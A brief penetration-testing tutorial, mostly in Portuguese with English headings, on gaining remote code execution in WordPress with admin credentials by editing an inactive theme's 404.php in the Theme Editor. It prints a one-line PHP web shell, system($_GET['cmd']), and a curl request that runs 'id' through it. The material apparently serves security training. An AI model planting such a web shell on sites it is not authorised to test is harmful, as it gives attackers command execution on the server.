Remote Code Execution (RCE) via the Theme Editor

Attacking the WordPress Backend

• Com acesso administrativo ao WordPress, podemos modificar o código-fonte do PHP para executar comandos do sistema. Para realizar este ataque, faça login no WordPress com credenciais de administrador, o que deve nos redirecionar para o painel de administração. Clique Appearanceno painel lateral e selecione Theme Editor. Esta página nos permitirá editar o código-fonte PHP diretamente. Devemos selecionar um tema inativo para evitar corromper o tema principal.

Twenty Seventeen Theme - 404.php

<?php

system($_GET['cmd']); 

/**
 * The template for displaying 404 pages (not found)
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
<SNIP>

• Podemos validar que alcançamos o RCE inserindo o URL no navegador da web ou emitindo a cURLsolicitação abaixo.

curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"